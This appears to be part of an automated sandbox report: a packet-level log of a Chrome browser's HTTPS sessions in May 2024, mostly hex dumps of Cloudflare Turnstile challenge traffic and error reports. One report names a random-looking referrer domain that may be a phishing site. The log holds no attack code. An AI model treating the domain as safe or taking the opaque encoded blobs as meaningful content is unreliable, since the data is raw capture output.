                          2024-05-22 15:56:54 UTC1369INData Raw: 4a 34 52 59 4a 6f 53 59 39 63 66 6f 64 6c 5a 47 31 74 61 57 68 77 61 58 4a 6c 6d 33 6c 77 62 35 46 67 57 6d 78 68 6b 46 31 32 68 36 64 6a 6c 70 2b 49 68 57 69 43 59 32 68 72 73 6f 4b 4b 6c 70 6d 5a 63 33 75 78 71 35 32 6f 66 4b 2b 5a 6a 73 53 6c 6e 37 57 61 6c 72 61 34 6c 4c 65 57 6f 4d 2b 2b 69 49 79 30 72 74 47 77 7a 38 61 4d 70 4c 54 4f 6e 61 65 53 6d 4e 69 72 6d 74 2b 77 70 65 62 42 73 71 6e 45 32 37 69 33 71 4e 7a 6d 77 63 50 66 72 38 66 7a 38 75 2f 6e 39 4c 66 30 76 62 32 38 34 65 75 2b 39 64 48 78 31 39 72 46 2b 75 6f 47 33 63 6e 4b 2f 75 4c 75 41 65 73 46 37 41 6f 4f 44 52 49 48 38 77 7a 77 34 42 50 59 44 68 6a 37 41 66 7a 39 46 41 72 71 4a 2f 59 63 4d 41 66 36 4b 41 38 70 44 79 34 30 41 67 6b 52 2b 51 77 70 50 54 50 39 4c 55 41 73 4d 68 38 38 50
                          Data Ascii: J4RYJoSY9cfodlZG1taWhwaXJlm3lwb5FgWmxhkF12h6djlp+IhWiCY2hrsoKKlpmZc3uxq52ofK+ZjsSln7Walra4lLeWoM++iIy0rtGwz8aMpLTOnaeSmNirmt+wpebBsqnE27i3qNzmwcPfr8fz8u/n9Lf0vb284eu+9dHx19rF+uoG3cnK/uLuAesF7AoODRIH8wzw4BPYDhj7Afz9FArqJ/YcMAf6KA8pDy40AgkR+QwpPTP9LUAsMh88P
                          2024-05-22 15:56:54 UTC1369INData Raw: 35 68 45 6c 45 5a 33 39 7a 6c 56 56 67 69 32 4f 61 56 33 31 32 6c 59 71 4f 64 31 31 69 70 6d 2b 49 71 47 6c 37 6c 6d 68 71 6a 36 4a 72 65 6d 35 72 63 72 46 79 6c 4c 6d 79 74 4b 74 33 70 5a 61 73 69 36 32 5a 6c 34 47 77 6c 6f 2b 70 67 63 47 43 77 6f 66 4c 68 63 61 4a 70 4c 7a 53 72 63 69 4a 73 62 44 52 74 64 50 4e 31 74 47 59 6c 39 75 79 33 4d 61 78 30 39 7a 66 79 2b 72 45 75 72 7a 6c 36 4d 2f 73 38 4d 54 67 72 50 4c 78 73 4f 76 34 2b 76 6a 72 30 65 44 57 79 39 7a 62 76 76 54 34 41 63 63 44 77 74 72 38 32 66 66 64 33 67 59 44 41 51 33 32 31 65 55 4b 43 41 54 59 32 52 41 53 45 67 73 57 44 2b 48 35 44 79 44 65 2b 66 58 72 4b 2b 4d 74 35 53 4d 50 4a 78 55 53 43 78 38 50 45 7a 45 46 50 53 6b 4e 47 52 4d 63 41 6b 49 68 49 52 64 42 45 6a 59 64 2f 41 51 33 42 53
                          Data Ascii: 5hElEZ39zlVVgi2OaV312lYqOd11ipm+IqGl7lmhqj6Jrem5rcrFylLmytKt3pZasi62Zl4Gwlo+pgcGCwofLhcaJpLzSrciJsbDRtdPN1tGYl9uy3Max09zfy+rEurzl6M/s8MTgrPLxsOv4+vjr0eDWy9zbvvT4AccDwtr82ffd3gYDAQ321eUKCATY2RASEgsWD+H5DyDe+fXrK+Mt5SMPJxUSCx8PEzEFPSkNGRMcAkIhIRdBEjYd/AQ3BS
                          2024-05-22 15:56:54 UTC1369INData Raw: 63 6f 70 32 6b 5a 47 53 66 57 64 77 6a 31 32 42 6e 6f 52 75 64 70 4b 41 64 58 46 67 6d 4b 43 56 5a 71 32 44 73 6e 36 30 63 71 31 30 74 6f 68 72 70 48 61 73 64 49 61 39 71 4c 36 51 6c 4a 32 75 76 62 36 6f 6c 59 6d 7a 71 70 76 44 71 4d 75 5a 77 61 79 51 74 5a 61 32 79 39 62 54 71 39 71 56 79 37 54 53 72 74 65 33 73 4e 69 67 32 36 54 64 79 64 66 68 34 73 33 73 32 65 54 52 79 72 2f 42 78 4b 2f 4f 31 61 7a 50 33 4d 7a 30 76 38 6a 52 2f 64 44 69 30 66 73 44 33 4f 44 35 76 64 37 62 41 2b 54 63 38 50 37 4b 37 75 4d 4e 37 4f 54 73 46 76 6a 32 36 78 54 30 37 50 59 53 45 50 45 6d 49 4f 50 6d 38 51 72 6e 4a 66 77 74 4d 42 49 4a 43 41 67 51 38 43 34 34 4e 67 51 53 4b 50 58 32 47 43 6a 34 2b 2f 30 31 47 69 50 39 4d 44 45 72 48 42 6f 57 50 43 38 5a 54 44 41 38 56 53 67
                          Data Ascii: cop2kZGSfWdwj12BnoRudpKAdXFgmKCVZq2Dsn60cq10tohrpHasdIa9qL6QlJ2uvb6olYmzqpvDqMuZwayQtZa2y9bTq9qVy7TSrte3sNig26Tdydfh4s3s2eTRyr/BxK/O1azP3Mz0v8jR/dDi0fsD3OD5vd7bA+Tc8P7K7uMN7OTsFvj26xT07PYSEPEmIOPm8QrnJfwtMBIJCAgQ8C44NgQSKPX2GCj4+/01GiP9MDErHBoWPC8ZTDA8VSg
                          2024-05-22 15:56:54 UTC1369INData Raw: 34 6d 58 62 6c 61 4c 6f 61 53 50 6e 5a 65 48 6e 70 61 6b 64 6e 52 35 6c 32 61 51 67 59 69 51 6a 36 2b 57 6d 4a 47 59 63 37 71 6c 6d 33 74 31 72 4c 2b 4d 6e 71 48 41 6f 4a 71 6a 76 38 71 4a 70 4a 7a 4f 75 4b 2b 52 30 72 79 7a 6b 4e 57 50 77 61 6a 55 70 62 53 73 72 63 37 50 71 39 48 69 6f 4f 44 66 32 62 69 68 31 38 43 6a 75 75 50 43 34 75 53 73 36 63 58 70 31 65 4f 79 37 74 6e 33 38 50 33 52 37 76 66 4b 77 64 69 2f 78 41 6a 2b 76 2f 66 54 41 65 6f 44 36 41 48 38 78 38 51 46 38 41 30 56 35 78 63 44 47 2b 77 62 48 78 58 35 47 42 49 62 46 74 7a 62 49 50 59 68 43 2f 55 59 49 76 67 6a 4c 77 6e 2b 41 53 6f 74 46 44 45 31 39 69 6e 77 4e 7a 62 30 4d 44 30 2f 50 54 41 57 4a 52 73 51 49 53 41 44 4f 54 31 46 44 45 63 48 48 42 35 4f 50 43 45 71 55 6b 55 76 55 54 73 61
                          Data Ascii: 4mXblaLoaSPnZeHnpakdnR5l2aQgYiQj6+WmJGYc7qlm3t1rL+MnqHAoJqjv8qJpJzOuK+R0ryzkNWPwajUpbSsrc7Pq9HioODf2bih18CjuuPC4uSs6cXp1eOy7tn38P3R7vfKwdi/xAj+v/fTAeoD6AH8x8QF8A0V5xcDG+wbHxX5GBIbFtzbIPYhC/UYIvgjLwn+ASotFDE19inwNzb0MD0/PTAWJRsQISADOT1FDEcHHB5OPCEqUkUvUTsa


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.44975335.190.80.14435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:54 UTC547OUTOPTIONS /report/v4?s=o0ekmHGO7BUUglj6sVXOCa9jW07J8%2BxhGuG7Gv6MyDJybA0DboQ9jX0yG5TgYHIu5YEKn4thwxOiKUMkx%2FMexzmMCRwigRjh97ib6vpP%2B%2F%2BpdHyAcT0C3menqQZ3Rw%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://oknya83345.eleteriod.com
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:55 UTC336INHTTP/1.1 200 OK
                          content-length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: POST, OPTIONS
                          access-control-allow-origin: *
                          access-control-allow-headers: content-length, content-type
                          date: Wed, 22 May 2024 15:56:54 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.449755104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:56 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:56 UTC375INHTTP/1.1 404 Not Found
                          Date: Wed, 22 May 2024 15:56:56 GMT
                          Content-Type: application/json
                          Content-Length: 7
                          Connection: close
                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                          cf-chl-out: SKwgNovi0b2aAxuaO25BeQ==$ZckC9pUdKIdj4/CNPnvNnQ==
                          Server: cloudflare
                          CF-RAY: 887dffc2e9ba1881-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                          Data Ascii: invalid


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.44975435.190.80.14435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:56 UTC480OUTPOST /report/v4?s=o0ekmHGO7BUUglj6sVXOCa9jW07J8%2BxhGuG7Gv6MyDJybA0DboQ9jX0yG5TgYHIu5YEKn4thwxOiKUMkx%2FMexzmMCRwigRjh97ib6vpP%2B%2F%2BpdHyAcT0C3menqQZ3Rw%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 449
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:56 UTC449OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 35 32 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 6b 6e 79 61 38 33 33 34 35 2e 65 6c 65 74 65 72 69 6f 64 2e 63 6f 6d 2f 69 6e 66 64 32 30 31 39 37 31 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65
                          Data Ascii: [{"age":1,"body":{"elapsed_time":1526,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://oknya83345.eleteriod.com/infd201971/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"ne
                          2024-05-22 15:56:56 UTC168INHTTP/1.1 200 OK
                          content-length: 0
                          date: Wed, 22 May 2024 15:56:56 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.449756104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:56 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWf HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:57 UTC200INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:56 GMT
                          Content-Type: image/png
                          Content-Length: 61
                          Connection: close
                          Server: cloudflare
                          CF-RAY: 887dffc81c898cb1-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 46 08 02 00 00 00 11 8e 1e ed 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                          Data Ascii: PNGIHDRGFIDAT$IENDB`


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.449758104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:58 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWf HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:58 UTC200INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:58 GMT
                          Content-Type: image/png
                          Content-Length: 61
                          Connection: close
                          Server: cloudflare
                          CF-RAY: 887dffd4290a7c96-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 46 08 02 00 00 00 11 8e 1e ed 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                          Data Ascii: PNGIHDRGFIDAT$IENDB`


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.449759104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:58 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/887dff9f6d8f429d/1716393414082/c0c2613fc26f1c8d1c5546c7cb6650be050f91d030f34066ed5eb405a0890187/hlziBgVNbWjZocR HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          Cache-Control: max-age=0
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:58 UTC143INHTTP/1.1 401 Unauthorized
                          Date: Wed, 22 May 2024 15:56:58 GMT
                          Content-Type: text/plain; charset=UTF-8
                          Content-Length: 1
                          Connection: close
                          2024-05-22 15:56:58 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 4d 4a 68 50 38 4a 76 48 49 30 63 56 55 62 48 79 32 5a 51 76 67 55 50 6b 64 41 77 38 30 42 6d 37 56 36 30 42 61 43 4a 41 59 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwMJhP8JvHI0cVUbHy2ZQvgUPkdAw80Bm7V60BaCJAYcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                          2024-05-22 15:56:58 UTC1INData Raw: 4a
                          Data Ascii: J


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.449760104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:00 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 30202
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Content-type: application/x-www-form-urlencoded
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          CF-Challenge: 4d20fcc93ec5b5c
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Origin: https://challenges.cloudflare.com
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:00 UTC16384OUTData Raw: 76 5f 38 38 37 64 66 66 39 66 36 64 38 66 34 32 39 64 3d 34 77 78 49 6d 38 74 4a 75 38 75 50 78 38 57 39 6a 50 78 49 4c 51 78 74 78 68 4a 74 72 39 49 49 74 77 68 69 39 24 39 31 78 38 76 39 6b 38 39 68 58 49 68 71 39 44 49 39 77 68 38 33 39 61 50 38 39 33 77 74 35 39 57 77 57 58 39 76 5a 58 39 30 6f 64 24 59 44 44 39 7a 58 77 74 43 39 72 56 74 47 6a 54 35 31 53 54 61 39 63 32 42 38 39 79 34 6e 79 75 39 65 49 50 4c 39 78 49 38 56 75 75 39 39 37 58 39 5a 44 39 39 5a 49 49 61 25 32 62 71 39 31 49 39 47 56 49 38 47 4d 6d 4e 38 67 4c 55 63 39 38 2b 74 75 67 54 59 47 78 78 63 76 75 61 66 56 6e 78 39 37 45 49 71 45 51 77 39 54 46 33 6e 39 78 2b 71 49 49 2d 39 41 49 74 46 30 4a 6a 38 54 56 24 2b 69 6f 6c 2d 37 47 47 38 7a 68 7a 30 68 2b 73 48 49 64 48 50 35 6f 5a
                          Data Ascii: v_887dff9f6d8f429d=4wxIm8tJu8uPx8W9jPxILQxtxhJtr9IItwhi9$91x8v9k89hXIhq9DI9wh839aP893wt59WwWX9vZX90od$YDD9zXwtC9rVtGjT51STa9c2B89y4nyu9eIPL9xI8Vuu997X9ZD99ZIIa%2bq91I9GVI8GMmN8gLUc98+tugTYGxxcvuafVnx97EIqEQw9TF3n9x+qII-9AItF0Jj8TV$+iol-7GG8zhz0h+sHIdHP5oZ
                          2024-05-22 15:57:00 UTC13818OUTData Raw: 68 6d 30 4c 39 6a 39 4d 49 34 56 38 58 75 43 49 5a 39 39 39 76 6d 39 68 58 58 59 39 54 58 38 34 76 53 39 78 4b 24 6e 39 42 39 61 78 39 38 39 54 44 33 78 74 78 39 57 49 33 39 4c 6a 39 54 41 33 75 68 46 39 4b 6a 75 56 68 54 39 76 77 54 58 38 57 39 49 58 50 5a 39 73 49 55 49 68 79 43 36 49 75 39 74 73 74 75 39 78 38 38 4c 74 41 39 44 57 4d 71 78 41 73 59 70 49 58 50 41 39 72 39 33 73 74 58 39 24 49 57 4e 74 32 74 6c 39 4f 39 38 4c 74 78 39 38 56 49 73 74 76 39 78 4a 63 4d 75 77 32 54 49 68 55 2d 47 67 57 63 35 44 66 32 6d 45 67 44 56 2d 34 4d 64 24 43 32 66 73 4d 75 31 43 38 66 75 6b 64 65 4e 4a 66 53 4e 34 31 43 4c 73 51 4b 61 31 77 6a 66 47 58 33 56 74 71 39 38 42 73 63 59 63 56 24 49 34 56 68 72 39 67 78 39 2d 74 2d 39 4d 49 78 48 48 6e 39 57 39 34 76 39
                          Data Ascii: hm0L9j9MI4V8XuCIZ999vm9hXXY9TX84vS9xK$n9B9ax989TD3xtx9WI39Lj9TA3uhF9KjuVhT9vwTX8W9IXPZ9sIUIhyC6Iu9tstu9x88LtA9DWMqxAsYpIXPA9r93stX9$IWNt2tl9O98Ltx98VIstv9xJcMuw2TIhU-GgWc5Df2mEgDV-4Md$C2fsMu1C8fukdeNJfSN41CLsQKa1wjfGX3Vtq98BscYcV$I4Vhr9gx9-t-9MIxHHn9W94v9
                          2024-05-22 15:57:00 UTC322INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:00 GMT
                          Content-Type: text/plain; charset=UTF-8
                          Content-Length: 22236
                          Connection: close
                          cf-chl-gen: Pa+aeA6Pr7UoviOcrdZRSViD1Y+K/XKZEzEVz3mt3+c3CkZ113ronXZSXtg3Fa0V$0AQen1gh3kQiZjvvIxCEvg==
                          Server: cloudflare
                          CF-RAY: 887dffdedc255e7e-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:00 UTC1047INData Raw: 66 47 78 47 54 34 61 50 68 46 46 64 62 6f 46 67 53 32 79 44 63 48 75 55 66 70 78 78 6b 70 43 67 64 5a 56 65 6c 32 65 5a 5a 6f 6c 37 6a 71 42 35 62 36 79 78 62 4a 61 70 6b 49 79 5a 73 4b 53 59 72 37 4b 6e 6a 48 65 76 75 5a 6d 4e 74 4a 36 61 74 70 61 67 68 61 71 69 6a 61 6a 53 7a 64 4f 47 68 34 33 57 79 73 7a 4c 70 73 6a 65 73 35 69 67 6d 72 65 2b 75 4a 7a 68 36 4e 4f 38 75 36 76 4b 32 4d 57 33 33 4c 72 77 35 4f 2b 75 72 2f 58 6d 73 66 66 4e 30 65 2f 50 75 4e 69 2f 7a 4e 4c 69 75 2f 7a 45 36 66 7a 70 31 66 73 43 33 63 6a 77 42 65 49 55 37 67 76 6e 7a 78 4d 4d 31 64 6a 32 45 2b 2f 31 44 42 50 7a 31 66 67 58 45 79 59 53 34 53 66 64 47 53 4d 51 34 52 45 6b 37 53 77 56 4a 76 4d 6d 4a 66 59 49 45 52 63 66 44 6a 34 37 4e 78 33 31 48 7a 45 37 41 51 49 46 42 68 59
                          Data Ascii: fGxGT4aPhFFdboFgS2yDcHuUfpxxkpCgdZVel2eZZol7jqB5b6yxbJapkIyZsKSYr7KnjHevuZmNtJ6atpaghaqijajSzdOGh43WyszLpsjes5igmre+uJzh6NO8u6vK2MW33Lrw5O+ur/XmsffN0e/PuNi/zNLiu/zE6fzp1fsC3cjwBeIU7gvnzxMM1dj2E+/1DBPz1fgXEyYS4SfdGSMQ4REk7SwVJvMmJfYIERcfDj47Nx31HzE7AQIFBhY
                          2024-05-22 15:57:00 UTC1369INData Raw: 58 6e 58 39 75 59 4a 6d 6e 68 57 56 36 71 58 61 70 66 5a 68 6e 71 35 75 4f 62 61 2b 76 6c 4c 6d 4f 72 34 6c 7a 66 62 57 39 6e 33 69 63 6b 58 2b 58 6d 37 4f 6f 6e 72 71 73 72 61 47 65 76 4d 37 41 76 38 50 47 30 36 48 50 32 4b 47 74 75 73 6a 4f 31 4a 58 51 72 4e 6d 77 75 37 48 5a 75 4d 43 31 31 4a 33 45 76 64 7a 6f 78 4c 33 64 77 73 33 42 34 4b 6e 49 30 4c 6e 4e 75 65 61 34 32 37 62 2b 75 63 4c 61 2f 76 6a 42 42 72 76 37 42 4c 37 49 2b 65 51 4d 36 68 48 68 41 51 77 46 47 4f 33 75 32 51 33 36 44 51 7a 64 37 65 6b 54 48 4f 49 67 49 68 76 37 43 50 4d 67 48 51 4d 4a 49 65 63 6f 48 43 67 72 46 53 51 6d 38 53 6e 33 2b 53 55 4c 4d 69 45 67 48 77 7a 31 47 50 63 43 42 69 6c 46 42 54 59 4b 50 51 59 6b 49 55 67 4d 50 55 64 4f 45 42 56 54 56 68 49 6c 48 46 49 58 46 6b
                          Data Ascii: XnX9uYJmnhWV6qXapfZhnq5uOba+vlLmOr4lzfbW9n3ickX+Xm7OonrqsraGevM7Av8PG06HP2KGtusjO1JXQrNmwu7HZuMC11J3EvdzoxL3dws3B4KnI0LnNuea427b+ucLa/vjBBrv7BL7I+eQM6hHhAQwFGO3u2Q36DQzd7ekTHOIgIhv7CPMgHQMJIecoHCgrFSQm8Sn3+SULMiEgHwz1GPcCBilFBTYKPQYkIUgMPUdOEBVTVhIlHFIXFk
                          2024-05-22 15:57:00 UTC1369INData Raw: 58 71 4b 67 6d 4a 6d 6a 5a 6d 36 66 66 4b 65 7a 68 57 75 73 6a 59 69 7a 70 35 79 31 66 61 2b 79 69 37 71 78 6e 70 2b 68 76 62 65 35 6c 63 47 65 71 5a 75 35 78 4c 6e 4e 78 71 6d 4e 6c 4b 71 57 72 37 54 44 73 37 47 31 75 74 4f 63 7a 4c 6e 4c 75 37 2f 64 73 65 6e 56 75 63 57 2f 79 4b 33 76 72 74 36 76 38 71 7a 65 78 66 48 43 30 63 6e 4b 36 2b 7a 49 37 67 43 7a 31 73 48 6b 30 73 43 39 31 51 72 59 41 66 58 39 36 75 38 42 35 41 66 4d 45 52 4d 51 42 65 7a 52 31 64 58 35 37 41 38 49 36 2f 30 5a 41 2b 4c 76 46 2f 51 6b 46 52 50 34 47 4f 63 6d 37 78 6f 6b 41 75 73 42 49 44 67 4a 4e 78 49 6c 43 69 38 51 44 67 2f 35 4d 42 38 34 46 51 52 45 49 77 4d 33 43 69 6f 64 4e 6a 70 4a 51 54 38 39 50 43 4d 33 51 68 68 46 52 55 63 62 4f 6a 6c 51 56 6c 56 44 54 43 46 68 56 53 64
                          Data Ascii: XqKgmJmjZm6ffKezhWusjYizp5y1fa+yi7qxnp+hvbe5lcGeqZu5xLnNxqmNlKqWr7TDs7G1utOczLnLu7/dsenVucW/yK3vrt6v8qzexfHC0cnK6+zI7gCz1sHk0sC91QrYAfX96u8B5AfMERMQBezR1dX57A8I6/0ZA+LvF/QkFRP4GOcm7xokAusBIDgJNxIlCi8QDg/5MB84FQREIwM3CiodNjpJQT89PCM3QhhFRUcbOjlQVlVDTCFhVSd
